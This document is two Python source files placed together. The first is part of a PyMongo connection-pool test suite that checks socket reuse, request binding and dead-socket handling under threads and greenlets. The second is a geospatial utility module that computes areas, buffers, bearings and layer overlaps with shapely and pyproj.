super(OneOp, self).__init__(ut)
def run_mongo_thread(self):
pool = self.connection._Connection__pool
assert len(pool.sockets) == 1, "Expected 1 socket, found %d" % (
len(pool.sockets)
)
sock_info = one(pool.sockets)
self.connection.start_request()
# start_request() hasn't yet moved the socket from the general pool into
# the request
assert len(pool.sockets) == 1
assert one(pool.sockets) == sock_info
self.connection[DB].test.find_one()
# find_one() causes the socket to be used in the request, so now it's
# bound to this thread
assert len(pool.sockets) == 0
assert pool._get_request_state() == sock_info
self.connection.end_request()
# The socket is back in the pool
assert len(pool.sockets) == 1
assert one(pool.sockets) == sock_info
class CreateAndReleaseSocket(MongoThread):
class Rendezvous(object):
def __init__(self, nthreads, use_greenlets):
self.nthreads = nthreads
self.nthreads_run = 0
if use_greenlets:
self.lock = gevent.coros.RLock()
self.ready = gevent.event.Event()
else:
self.lock = threading.Lock()
self.ready = threading.Event()
def __init__(self, ut, connection, start_request, end_request, rendevous):
super(CreateAndReleaseSocket, self).__init__(ut)
self.connection = connection
self.start_request = start_request
self.end_request = end_request
self.rendevous = rendevous
def run_mongo_thread(self):
# Do an operation that requires a socket.
# test_max_pool_size uses this to spin up lots of threads requiring
# lots of simultaneous connections, to ensure that Pool obeys its
# max_size configuration and closes extra sockets as they're returned.
for i in range(self.start_request):
self.connection.start_request()
# Use a socket
self.connection[DB].test.find_one()
# Don't finish until all threads reach this point
r = self.rendevous
r.lock.acquire()
r.nthreads_run += 1
if r.nthreads_run == r.nthreads:
# Everyone's here, let them finish
r.ready.set()
r.lock.release()
else:
r.lock.release()
r.ready.wait(2) # Wait two seconds
assert r.ready.isSet(), "Rendezvous timed out"
for i in range(self.end_request):
self.connection.end_request()
class _TestPoolingBase(object):
"""Base class for all connection-pool tests. Doesn't inherit from
unittest.TestCase, and its name is prefixed with "_" to avoid being
run by nose. Real tests double-inherit from this base and from TestCase.
"""
use_greenlets = False
def setUp(self):
if self.use_greenlets:
if not has_gevent:
raise SkipTest("Gevent not installed")
# Note we don't do patch_thread() or patch_all() - we're
# testing here that patch_thread() is unnecessary for
# the connection pool to work properly.
monkey.patch_socket()
self.c = self.get_connection(auto_start_request=False)
# reset the db
db = self.c[DB]
db.unique.drop()
db.test.drop()
db.unique.insert({"_id": "jesse"})
db.test.insert([{} for i in range(10)])
def tearDown(self):
self.c.close()
if self.use_greenlets:
# Undo patch
reload(socket)
def get_connection(self, *args, **kwargs):
opts = kwargs.copy()
opts['use_greenlets'] = self.use_greenlets
return get_connection(*args, **opts)
def get_pool(self, *args, **kwargs):
if self.use_greenlets:
klass = GreenletPool
else:
klass = Pool
return klass(*args, **kwargs)
def assert_no_request(self):
self.assertEqual(
NO_REQUEST, self.c._Connection__pool._get_request_state()
)
def assert_request_without_socket(self):
self.assertEqual(
NO_SOCKET_YET, self.c._Connection__pool._get_request_state()
)
def assert_request_with_socket(self):
self.assertTrue(isinstance(
self.c._Connection__pool._get_request_state(), SocketInfo
))
def assert_pool_size(self, pool_size):
self.assertEqual(
pool_size, len(self.c._Connection__pool.sockets)
)
class _TestPooling(_TestPoolingBase):
"""Basic pool tests, to be applied both to Pool and GreenletPool"""
def test_max_pool_size_validation(self):
self.assertRaises(
ConfigurationError, Connection, host=host, port=port,
max_pool_size=-1
)
self.assertRaises(
ConfigurationError, Connection, host=host, port=port,
max_pool_size='foo'
)
c = Connection(host=host, port=port, max_pool_size=100)
self.assertEqual(c.max_pool_size, 100)
def test_no_disconnect(self):
run_cases(self, [NoRequest, NonUnique, Unique, SaveAndFind])
def test_simple_disconnect(self):
# Connection just created, expect 1 free socket
self.assert_pool_size(1)
self.assert_no_request()
self.c.start_request()
self.assert_request_without_socket()
cursor = self.c[DB].stuff.find()
# Cursor hasn't actually caused a request yet, so there's still 1 free
# socket.
self.assert_pool_size(1)
self.assert_request_without_socket()
# Actually make a request to server, triggering a socket to be
# allocated to the request
list(cursor)
self.assert_pool_size(0)
self.assert_request_with_socket()
# Pool returns to its original state
self.c.end_request()
self.assert_no_request()
self.assert_pool_size(1)
self.c.disconnect()
self.assert_pool_size(0)
self.assert_no_request()
def test_disconnect(self):
run_cases(self, [SaveAndFind, Disconnect, Unique])
def test_independent_pools(self):
# Test for regression of very early PyMongo bug: separate pools shared
# state.
p = self.get_pool((host, port), 10, None, None, False)
self.c.start_request()
self.c.pymongo_test.test.find_one()
self.assertEqual(set(), p.sockets)
self.c.end_request()
self.assert_pool_size(1)
self.assertEqual(set(), p.sockets)
def test_dependent_pools(self):
self.assert_pool_size(1)
self.c.start_request()
self.assert_request_without_socket()
self.c.test.test.find_one()
self.assert_request_with_socket()
self.assert_pool_size(0)
self.c.end_request()
self.assert_pool_size(1)
t = OneOp(self)
t.start()
t.join()
self.assertTrue(t.passed, "OneOp.run() threw exception")
self.assert_pool_size(1)
self.c.test.test.find_one()
self.assert_pool_size(1)
def test_multiple_connections(self):
a = self.get_connection(auto_start_request=False)
b = self.get_connection(auto_start_request=False)
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(1, len(b._Connection__pool.sockets))
a.start_request()
a.test.test.find_one()
self.assertEqual(0, len(a._Connection__pool.sockets))
a.end_request()
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(1, len(b._Connection__pool.sockets))
a_sock = one(a._Connection__pool.sockets)
b.end_request()
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(1, len(b._Connection__pool.sockets))
b.start_request()
b.test.test.find_one()
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(0, len(b._Connection__pool.sockets))
b.end_request()
b_sock = one(b._Connection__pool.sockets)
b.test.test.find_one()
a.test.test.find_one()
self.assertEqual(b_sock,
b._Connection__pool.get_socket((b.host, b.port)))
self.assertEqual(a_sock,
a._Connection__pool.get_socket((a.host, a.port)))
a_sock.close()
b_sock.close()
def test_request(self):
# Check that Pool gives two different sockets in two calls to
# get_socket() -- doesn't automatically put us in a request any more
cx_pool = self.get_pool(
pair=(host,port),
max_size=10,
net_timeout=1000,
conn_timeout=1000,
use_ssl=False
)
sock0 = cx_pool.get_socket()
sock1 = cx_pool.get_socket()
self.assertNotEqual(sock0, sock1)
# Now in a request, we'll get the same socket both times
cx_pool.start_request()
sock2 = cx_pool.get_socket()
sock3 = cx_pool.get_socket()
self.assertEqual(sock2, sock3)
# Pool didn't keep reference to sock0 or sock1; sock2 and 3 are new
self.assertNotEqual(sock0, sock2)
self.assertNotEqual(sock1, sock2)
# Return the request sock to pool
cx_pool.end_request()
sock4 = cx_pool.get_socket()
sock5 = cx_pool.get_socket()
# Not in a request any more, we get different sockets
self.assertNotEqual(sock4, sock5)
# end_request() returned sock2 to pool
self.assertEqual(sock4, sock2)
for s in [sock0, sock1, sock2, sock3, sock4, sock5]:
s.close()
def test_reset_and_request(self):
# reset() is called after a fork, or after a socket error. Ensure that
# a new request is begun if a request was in progress when the reset()
# occurred, otherwise no request is begun.
p = self.get_pool((host, port), 10, None, None, False)
self.assertFalse(p.in_request())
p.start_request()
self.assertTrue(p.in_request())
p.reset()
self.assertTrue(p.in_request())
p.end_request()
self.assertFalse(p.in_request())
p.reset()
self.assertFalse(p.in_request())
def test_pool_reuses_open_socket(self):
# Test Pool's _check_closed() method doesn't close a healthy socket
cx_pool = self.get_pool((host,port), 10, None, None, False)
sock_info = cx_pool.get_socket()
cx_pool.maybe_return_socket(sock_info)
# trigger _check_closed, which only runs on sockets that haven't been
# used in a second
time.sleep(1.1)
new_sock_info = cx_pool.get_socket()
self.assertEqual(sock_info, new_sock_info)
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_socket(self):
# Test that Pool removes dead socket and the socket doesn't return
# itself PYTHON-344
cx_pool = self.get_pool((host,port), 10, None, None, False)
sock_info = cx_pool.get_socket()
# Simulate a closed socket without telling the SocketInfo it's closed
sock_info.sock.close()
self.assertTrue(pymongo.pool._closed(sock_info.sock))
cx_pool.maybe_return_socket(sock_info)
time.sleep(1.1) # trigger _check_closed
new_sock_info = cx_pool.get_socket()
self.assertEqual(0, len(cx_pool.sockets))
self.assertNotEqual(sock_info, new_sock_info)
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_request_socket_after_1_sec(self):
# Test that Pool keeps request going even if a socket dies in request
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool.start_request()
# Get the request socket
sock_info = cx_pool.get_socket()
self.assertEqual(0, len(cx_pool.sockets))
self.assertEqual(sock_info, cx_pool._get_request_state())
sock_info.sock.close()
cx_pool.maybe_return_socket(sock_info)
time.sleep(1.1) # trigger _check_closed
# Although the request socket died, we're still in a request with a
# new socket
new_sock_info = cx_pool.get_socket()
self.assertTrue(cx_pool.in_request())
self.assertNotEqual(sock_info, new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
self.assertEqual(0, len(cx_pool.sockets))
cx_pool.end_request()
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_request_socket(self):
# Test that Pool keeps request going even if a socket dies in request
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool.start_request()
# Get the request socket
sock_info = cx_pool.get_socket()
self.assertEqual(0, len(cx_pool.sockets))
self.assertEqual(sock_info, cx_pool._get_request_state())
# Unlike in test_pool_removes_dead_request_socket_after_1_sec, we
# set sock_info.closed and *don't* wait 1 second
sock_info.close()
cx_pool.maybe_return_socket(sock_info)
# Although the request socket died, we're still in a request with a
# new socket
new_sock_info = cx_pool.get_socket()
self.assertTrue(cx_pool.in_request())
self.assertNotEqual(sock_info, new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
self.assertEqual(0, len(cx_pool.sockets))
cx_pool.end_request()
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_socket_after_request(self):
# Test that Pool handles a socket dying that *used* to be the request
# socket.
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool.start_request()
# Get the request socket
sock_info = cx_pool.get_socket()
self.assertEqual(sock_info, cx_pool._get_request_state())
# End request
cx_pool.end_request()
self.assertEqual(1, len(cx_pool.sockets))
# Kill old request socket
sock_info.sock.close()
cx_pool.maybe_return_socket(sock_info)
time.sleep(1.1) # trigger _check_closed
# Dead socket detected and removed
new_sock_info = cx_pool.get_socket()
self.assertFalse(cx_pool.in_request())
self.assertNotEqual(sock_info, new_sock_info)
self.assertEqual(0, len(cx_pool.sockets))
self.assertFalse(pymongo.pool._closed(new_sock_info.sock))
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(1, len(cx_pool.sockets))
def test_socket_reclamation(self):
if sys.platform.startswith('java'):
raise SkipTest("Jython can't do socket reclamation")
# Check that if a thread starts a request and dies without ending
# the request, that the socket is reclaimed into the pool.
cx_pool = self.get_pool(
pair=(host,port),
max_size=10,
net_timeout=1000,
conn_timeout=1000,
use_ssl=False,
)
self.assertEqual(0, len(cx_pool.sockets))
lock = None
the_sock = [None]
def leak_request():
self.assertEqual(NO_REQUEST, cx_pool._get_request_state())
cx_pool.start_request()
self.assertEqual(NO_SOCKET_YET, cx_pool._get_request_state())
sock_info = cx_pool.get_socket()
self.assertEqual(sock_info, cx_pool._get_request_state())
the_sock[0] = id(sock_info.sock)
cx_pool.maybe_return_socket(sock_info)
if not self.use_greenlets:
lock.release()
if self.use_greenlets:
g = Greenlet(leak_request)
g.start()
g.join(1)
self.assertTrue(g.ready(), "Greenlet is hung")
else:
lock = thread.allocate_lock()
lock.acquire()
# Start a thread WITHOUT a threading.Thread - important to test that
# Pool can deal with primitive threads.
thread.start_new_thread(leak_request, ())
# Join thread
acquired = lock.acquire()
self.assertTrue(acquired, "Thread is hung")
# Make sure thread is really gone
time.sleep(1)
if 'PyPy' in sys.version:
gc.collect()
# Access the thread local from the main thread to trigger the
# ThreadVigil's delete callback, returning the request socket to
# the pool.
# In Python 2.6 and lesser, a dead thread's locals are deleted
# and those locals' weakref callbacks are fired only when another
# thread accesses the locals and finds the thread state is stale.
# This is more or less a bug in Python <= 2.6. Accessing the thread
# local from the main thread is a necessary part of this test, and
# realistic: in a multithreaded web server a new thread will access
# Pool._local soon after an old thread has died.
getattr(cx_pool._local, 'whatever', None)
# Pool reclaimed the socket
self.assertEqual(1, len(cx_pool.sockets))
self.assertEqual(the_sock[0], id(one(cx_pool.sockets).sock))
class _TestMaxPoolSize(_TestPoolingBase):
"""Test that connection pool keeps proper number of idle sockets open,
no matter how start/end_request are called. To be applied both to Pool and
GreenletPool.
"""
def _test_max_pool_size(self, start_request, end_request):
c = self.get_connection(max_pool_size=4, auto_start_request=False)
# If you increase nthreads over about 35, note a
# Gevent 0.13.6 bug on Mac, Greenlet.join() hangs if more than
# about 35 Greenlets share a Connection. Apparently fixed in
# recent Gevent development.
nthreads = 10
rendevous = CreateAndReleaseSocket.Rendezvous(
nthreads, self.use_greenlets)
threads = []
for i in range(nthreads):
t = CreateAndReleaseSocket(
self, c, start_request, end_request, rendevous)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
for t in threads:
self.assertTrue(t.passed)
# Socket-reclamation doesn't work in Jython
if not sys.platform.startswith('java'):
cx_pool = c._Connection__pool
# Socket-reclamation depends on timely garbage-collection
if 'PyPy' in sys.version:
gc.collect()
if self.use_greenlets:
# Wait for Greenlet.link() callbacks to execute
the_hub = hub.get_hub()
if hasattr(the_hub, 'join'):
# Gevent 1.0
the_hub.join()
else:
# Gevent 0.13 and less
the_hub.shutdown()
if start_request:
self.assertEqual(4, len(cx_pool.sockets))
else:
# Without calling start_request(), threads can safely share
# sockets; the number running concurrently, and hence the number
# of sockets needed, is between 1 and 10, depending on thread-
# scheduling.
self.assertTrue(len(cx_pool.sockets) >= 1)
def test_max_pool_size(self):
self._test_max_pool_size(0, 0)
def test_max_pool_size_with_request(self):
self._test_max_pool_size(1, 1)
def test_max_pool_size_with_redundant_request(self):
self._test_max_pool_size(2, 1)
self._test_max_pool_size(20, 1)
def test_max_pool_size_with_leaked_request(self):
# Call start_request() but not end_request() -- when threads die, they
# should return their request sockets to the pool.
self._test_max_pool_size(1, 0)
def test_max_pool_size_with_end_request_only(self):
# Call end_request() but not start_request()
self._test_max_pool_size(0, 1)
class _TestPoolSocketSharing(_TestPoolingBase):
"""Directly test that two simultaneous operations don't share a socket. To
be applied both to Pool and GreenletPool.
"""
def _test_pool(self, use_request):
"""
Test that the connection pool prevents both threads and greenlets from
using a socket at the same time.
Sequence:
gr0: start a slow find()
gr1: start a fast find()
gr1: get results
gr0: get results
"""
cx = get_connection(
use_greenlets=self.use_greenlets,
auto_start_request=False
)
db = cx.pymongo_test
db.test.remove(safe=True)
db.test.insert({'_id': 1}, safe=True)
history = []
def find_fast():
if use_request:
cx.start_request()
history.append('find_fast start')
# With greenlets and the old connection._Pool, this would throw
# AssertionError: "This event is already used by another
# greenlet"
self.assertEqual({'_id': 1}, db.test.find_one())
history.append('find_fast done')
if use_request:
cx.end_request()
def find_slow():
if use_request:
cx.start_request()
history.append('find_slow start')
# Javascript function that pauses N seconds per document
fn = delay(10)
if (is_mongos(db.connection) or not
version.at_least(db.connection, (1, 7, 2))):
# mongos doesn't support eval so we have to use $where
# which is less reliable in this context.
self.assertEqual(1, db.test.find({"$where": fn}).count())
else:
# 'nolock' allows find_fast to start and finish while we're
# waiting for this to complete.
self.assertEqual({'ok': 1.0, 'retval': True},
db.command('eval', fn, nolock=True))
history.append('find_slow done')
if use_request:
cx.end_request()
if self.use_greenlets:
gr0, gr1 = Greenlet(find_slow), Greenlet(find_fast)
gr0.start()
gr1.start_later(.1)
else:
gr0 = threading.Thread(target=find_slow)
gr0.setDaemon(True)
gr1 = threading.Thread(target=find_fast)
gr1.setDaemon(True)
gr0.start()
time.sleep(.1)
gr1.start()
gr0.join()
gr1.join()
self.assertEqual([
'find_slow start',
'find_fast start',
'find_fast done',
'find_slow done',
], history)
def test_pool(self):
self._test_pool(use_request=False)
def test_pool_request(self):
self._test_pool(use_request=True)
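# Hedged sketch (not part of the test suite) of the request semantics these tests exercise:
# inside start_request()/end_request() a thread is pinned to one pool socket, mirroring the
# get_connection() helper used in _test_pool() above.
#   c = get_connection(auto_start_request=False)
#   c.start_request()
#   c.pymongo_test.test.find_one()   # this find ...
#   c.pymongo_test.test.find_one()   # ... and this one reuse the same socket
#   c.end_request()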
|
spatial.py
|
import bottle
#import os
import sys
import requests
import json
import pyproj
import traceback
import math
#from datetime import datetime
from multiprocessing import Process, Pipe
from shapely.geometry import shape,MultiPoint,Point,mapping
from shapely.geometry.polygon import Polygon
from shapely.geometry.multipolygon import MultiPolygon
from shapely.geometry.collection import GeometryCollection
from shapely.geometry.base import BaseGeometry
from shapely import ops
from functools import partial
import settings
import kmi
proj_aea = lambda geometry: pyproj.Proj("+proj=aea +lat_1=-17.5 +lat_2=-31.5 +lat_0=0 +lon_0=121 +x_0=5000000 +y_0=10000000 +ellps=GRS80 +towgs84=0,0,0,0,0,0,0 +units=m +no_defs")
def exportGeojson(feat,fname):
if isinstance(feat,BaseGeometry):
geojson = {
"type":"FeatureCollection",
"features":[
{
"type":"Feature",
"geometry":mapping(feat),
"properties":{}
}
]
}
elif isinstance(feat,tuple):
geojson = {
"type":"FeatureCollection",
"features":[
{
"type":"Feature",
"geometry":mapping(feat[0]),
"properties":feat[1] or {}
}
]
}
elif isinstance(feat,list):
features = []
geojson = {
"type":"FeatureCollection",
"features":features
}
for f in feat:
if isinstance(f,BaseGeometry):
features.append({
"type":"Feature",
"geometry":mapping(f),
"properties":{}
})
elif isinstance(f,tuple):
features.append({
"type":"Feature",
"geometry":mapping(f[0]),
"properties":f[1] or {}
})
else:
raise Exception("Unsupported type({}.{})".format(f.__class__.__module__,f.__class__.__name__))
else:
raise Exception("Unsupported type({}.{})".format(feat.__class__.__module__,feat.__class__.__name__))
with open(fname,'w') as f:
f.write(json.dumps(geojson,indent=True))
return fname
proj_wgs84 = pyproj.Proj(init='epsg:4326')
def buffer(lon, lat, meters,resolution=16):
"""
Create a buffer around a point
"""
# Azimuthal equidistant projection
aeqd_proj = '+proj=aeqd +lat_0={} +lon_0={} +x_0=0 +y_0=0'
project = partial(
pyproj.transform,
pyproj.Proj(aeqd_proj.format(lat, lon)),
proj_wgs84)
buf = Point(0, 0).buffer(meters,resolution=resolution) # distance in metres
return ops.transform(project, buf).exterior.coords[:]
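# Hedged usage sketch, not called anywhere in this module; the coordinates are made-up
# example values. buffer() returns the ring coordinates, so wrapping them in a shapely
# Polygon gives an approximately 500 m circle around the point.
def _example_point_buffer():
    ring = buffer(115.86, -31.95, 500, resolution=16)  # lon, lat, metres
    return Polygon(ring)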
def getShapelyGeometry(feature):
if not feature["geometry"]:
return None
elif feature["geometry"]["type"] == "GeometryCollection":
return GeometryCollection([shape(g) for g in feature["geometry"]["geometries"]])
else:
return shape(feature["geometry"])
def transform(geometry,src_proj="EPSG:4326",target_proj='aea'):
if src_proj == target_proj:
return geometry
else:
if src_proj == 'aea':
src_proj = proj_aea(geometry)
else:
src_proj = pyproj.Proj(init=src_proj)
if target_proj == 'aea':
target_proj = proj_aea(geometry)
else:
target_proj = pyproj.Proj(init=target_proj)
return ops.transform(
partial(
pyproj.transform,
src_proj,
#pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3])
                #use the 'Albers Equal Area Conic for WA' projection to calculate the area
target_proj
),
geometry
)
def getGeometryArea(geometry,unit,src_proj="EPSG:4326"):
"""
    Get a polygon's area using the Albers Equal Area Conic projection for WA
"""
if src_proj == 'aea':
geometry_aea = geometry
else:
geometry_aea = ops.transform(
partial(
pyproj.transform,
pyproj.Proj(init=src_proj),
#pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3])
                #use the 'Albers Equal Area Conic for WA' projection to calculate the area
proj_aea(geometry)
),
geometry
)
data = geometry_aea.area
if unit == "ha" :
return data / 10000.00
elif unit == "km2":
return data / 1000000.00
else:
return data
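# Hedged usage sketch, not called anywhere: area of the ~500 m circle built in the sketch
# above, in hectares, via the module's Albers Equal Area projection. A true 500 m circle is
# about 78.5 ha, so the result should land in that neighbourhood.
def _example_buffer_area_ha():
    return getGeometryArea(_example_point_buffer(), "ha")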
degrees2radians = math.pi / 180
radians2degrees = 180 / math.pi
def getBearing(p1,p2):
lon1 = degrees2radians * p1.x
lon2 = degrees2radians * p2.x
lat1 = degrees2radians * p1.y
lat2 = degrees2radians * p2.y
a = math.sin(lon2 - lon1) * math.cos(lat2)
    b = math.cos(lat1) * math.sin(lat2) - math.sin(lat1) * math.cos(lat2) * math.cos(lon2 - lon1)
    bearing = radians2degrees * math.atan2(a, b)
return bearing if bearing >= 0 else bearing + 360
directions = {
4:[360/4,math.floor(360 / 8 * 100) / 100,["N","E","S","W"]],
8:[360/8,math.floor(360 / 16 * 100) / 100,["N","NE","E","SE","S","SW","W","NW"]],
16:[360/16,math.floor(360 / 32 * 100) / 100,["N","NNE","NE","ENE","E","ESE","SE","SSE","S","SSW","SW","WSW","W","WNW","NW","NNW"]],
32:[360/32,math.floor(360 / 64 * 100) / 100,["N","NbE","NNE","NEbN","NE","NEbE","ENE","EbN","E","EbS","ESE","SEbE","SE","SEbS","SSE","SbE","S","SbW","SSW","SWbS","SW","SWbW","WSW","WbS","W","WbN","WNW","NWbW","NW","NWbN","NNW","NbW"]],
}
def getDirection(bearing,mode = 16):
mode = mode or 16
if mode not in directions:
mode = 16
    index = int((math.floor(bearing / directions[mode][0]) + (0 if round(bearing % directions[mode][0], 2) <= directions[mode][1] else 1)) % mode)
return directions[mode][2][index]
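# Hedged usage sketch, not called anywhere; the two WGS84 points are made-up values a few
# kilometres apart. getBearing() returns degrees clockwise from north and getDirection()
# maps that onto a compass rose, so this is expected to come out around "NE".
def _example_bearing_direction():
    p1 = Point(115.86, -31.95)
    p2 = Point(116.00, -31.80)
    bearing = getBearing(p1, p2)
    return bearing, getDirection(bearing, 16)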
def getDistance(p1,p2,unit="m",p1_proj="EPSG:4326",p2_proj="EPSG:4326"):
if p1_proj == 'aea':
p1_aea = p1
else:
p1_aea = ops.transform(
partial(
pyproj.transform,
pyproj.Proj(init=p1_proj),
#pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3])
                #use the 'Albers Equal Area Conic for WA' projection to calculate the distance
proj_aea(p1)
),
p1
)
if p2_proj == 'aea':
p2_aea = p2
else:
p2_aea = ops.transform(
partial(
pyproj.transform,
pyproj.Proj(init=p2_proj),
#pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3])
                #use the 'Albers Equal Area Conic for WA' projection to calculate the distance
proj_aea(p2)
),
p2
)
data = p1_aea.distance(p2_aea)
if unit == "km" :
return data / 1000.00
else:
return data
#return the Polygon or MultiPolygon parts if there are any, otherwise return None
def extractPolygons(geom):
if not geom:
return None
elif isinstance(geom,Polygon) or isinstance(geom,MultiPolygon):
return geom
elif isinstance(geom,GeometryCollection):
result = None
for g in geom:
p = extractPolygons(g)
if not p:
continue
elif not result:
result = p
elif isinstance(result,MultiPolygon):
result = [geom1 for geom1 in result.geoms]
if isinstance(p,Polygon):
result.append(p)
result = MultiPolygon(result)
else:
for geom1 in p.geoms:
result.append(geom1)
result = MultiPolygon(result)
else:
if isinstance(p,Polygon):
result = MultiPolygon([result,p])
else:
result = [result]
for geom1 in p.geoms:
result.append(geom1)
result = MultiPolygon(result)
return result
else:
return None
def extractPoints(geom):
if isinstance(geom,Point) or isinstance(geom,MultiPoint):
return geom
elif isinstance(geom,GeometryCollection):
result = None
for g in geom:
p = extractPoints(g)
if not p:
continue
elif not result:
result = p
elif isinstance(result,MultiPoint):
result = [geom1 for geom1 in result.geoms]
if isinstance(p,Point):
result.append(p)
result = MultiPoint(result)
else:
for geom1 in p.geoms:
result.append(geom1)
result = MultiPoint(result)
else:
if isinstance(p,Point):
result = MultiPoint([result,p])
else:
result = [result]
for geom1 in p.geoms:
result.append(geom1)
result = MultiPoint(result)
return result
else:
return None
def retrieveFeatures(url,session_cookies):
res = requests.get(url,verify=False,cookies=session_cookies)
res.raise_for_status()
return res.json()
def checkOverlap(session_cookies,feature,options,logfile):
# needs gdal 1.10+
layers = options["layers"]
geometry = extractPolygons(getShapelyGeometry(feature))
if not geometry :
return
features = {}
#retrieve all related features from layers
for layer in layers:
if layer.get('cqlfilter'):
layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=BBOX({},{},{},{},{}) AND {}".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2],layer['cqlfilter'])
else:
layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&bbox={},{},{},{}".format(layer["kmiservice"],layer["layerid"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2])
features[layer["id"]] = retrieveFeatures(layer_url, session_cookies)["features"]
for layer_feature in features[layer["id"]]:
layer_geometry = getShapelyGeometry(layer_feature)
layer_feature["geometry"] = layer_geometry
    #check whether features from different layers overlap
layergroup_index1 = 0
while layergroup_index1 < len(layers) - 1:
layer1 = layers[layergroup_index1]
layergroup_index1 += 1
layer_features1 = features[layer1["id"]]
        #check whether the layers' features overlap.
feature_index1 = 0
while feature_index1 < len(layer_features1):
feature1 = layer_features1[feature_index1]
feature_index1 += 1
feature_geometry1 = feature1["geometry"]
if not isinstance(feature_geometry1,Polygon) and not isinstance(feature_geometry1,MultiPolygon):
continue
layergroup_index2 = layergroup_index1
while layergroup_index2 < len(layers):
layer2 = layers[layergroup_index2]
layergroup_index2 += 1
layer_features2 = features[layer2["id"]]
feature_index2 = 0
while feature_index2 < len(layer_features2):
feature2 = layer_features2[feature_index2]
feature_index2 += 1
feature_geometry2 = feature2["geometry"]
feature_geometry1 = feature1["geometry"]
if not isinstance(feature_geometry2,Polygon) and not isinstance(feature_geometry2,MultiPolygon):
continue
intersections = extractPolygons(feature_geometry1.intersection(feature_geometry2))
if not intersections:
continue
layer1_pk = layer1.get("primary_key")
layer2_pk = layer2.get("primary_key")
if layer1_pk:
if isinstance(layer1_pk,basestring):
feat1 = "{}({}={})".format(layer1["layerid"],layer1_pk,feature1["properties"][layer1_pk])
else:
feat1 = "{}({})".format(layer1["layerid"],", ".join(["{}={}".format(k,v) for k,v in feature1["properties"].iteritems() if k in layer1_pk ]))
else:
feat1 = "{}({})".format(layer1["layerid"],json.dumps(feature1["properties"]))
if layer2_pk:
if isinstance(layer2_pk,basestring):
feat2 = "{}({}={})".format(layer2["layerid"],layer2_pk,feature2["properties"][layer2_pk])
else:
feat2 = "{}({})".format(layer2["layerid"],", ".join(["{}={}".format(k,v) for k,v in feature2["properties"].iteritems() if k in layer2_pk ]))
else:
feat2 = "{}({})".format(layer2["layerid"],json.dumps(feature2["properties"]))
msg = "intersect({}, {}) = {} ".format( feat1,feat2, intersections )
with open(logfile,"a") as f:
f.write(msg)
f.write("\n")
def calculateArea(feature,session_cookies,options):
"""
return:{
status {
"invalid" : invalid message;
"failed" : failed message;
"overlapped" : overlap message
}
data: {
total_area: 100 //exist if status_code = 1
other_area: 10 //exist if status_code = 1 and len(layers) > 0
layers: { //exist if status_code = 1 and len(layers) > 0
layer id: {
total_area: 12
areas:[
{area:1, properties:{
name:value
}}
]
}
}
}
}
    The reason for calculating the area in another process is to release the memory immediately after the area is calculated.
"""
if not settings.CALCULATE_AREA_IN_SEPARATE_PROCESS:
return _calculateArea(feature,session_cookies,options,False)
parent_conn,child_conn = Pipe(True)
p = Process(target=calculateAreaInProcess,args=(child_conn,))
p.daemon = True
p.start()
parent_conn.send([feature,session_cookies,options])
result = parent_conn.recv()
parent_conn.close()
#p.join()
#print("{}:get the area result from other process".format(datetime.now()))
return result
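# Hedged sketch of the options dict calculateArea() above expects; the field names are taken
# from _calculateArea() further below, but the layer id, layerid and property mapping are
# invented for illustration only.
EXAMPLE_AREA_OPTIONS = {
    "layers": [
        {"id": "tenure", "layerid": "cddp:tenure", "properties": {"name": "tenure_name"}},
    ],
    "unit": "ha",
    "layer_overlap": False,
    "merge_result": True,
}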
def calculateAreaInProcess(conn):
feature,session_cookies,options = conn.recv()
result = _calculateArea(feature,session_cookies,options,True)
if "overlap_logfile" in result:
overlapLogfile = result["overlap_logfile"]
del result["overlap_logfile"]
else:
overlapLogfile = None
conn.send(result)
conn.close()
#print("{}:Calculating area finiahed".format(datetime.now()))
#import time
#time.sleep(30)
#if overlapLogfile:
# try:
# if os.path.exists(overlapLogfile):
# os.remove(overlapLogfile)
# except:
# pass
# checkOverlap(session_cookies,feature,options,overlapLogfile)
#print("{}:subprocess finished".format(datetime.now()))
def calculateFeatureArea(feature,src_proj="EPSG:4326",unit='ha'):
return calculateGeometryArea(getShapelyGeometry(feature),src_proj=src_proj,unit=unit)
def calculateGeometryArea(geometry,src_proj="EPSG:4326",unit='ha'):
geometry = extractPolygons(geometry)
if not geometry :
return 0
valid,msg = geometry.check_valid
if not valid:
print("geometry is invalid.{}", msg)
geometry_aea = transform(geometry,src_proj=src_proj,target_proj='aea')
return getGeometryArea(geometry_aea,unit,'aea')
def _calculateArea(feature,session_cookies,options,run_in_other_process=False):
# needs gdal 1.10+
layers = options["layers"]
unit = options["unit"] or "ha"
overlap = options["layer_overlap"] or False
merge_result = options.get("merge_result",False)
area_data = {}
status = {}
result = {"status":status,"data":area_data}
total_area = 0
total_layer_area = 0
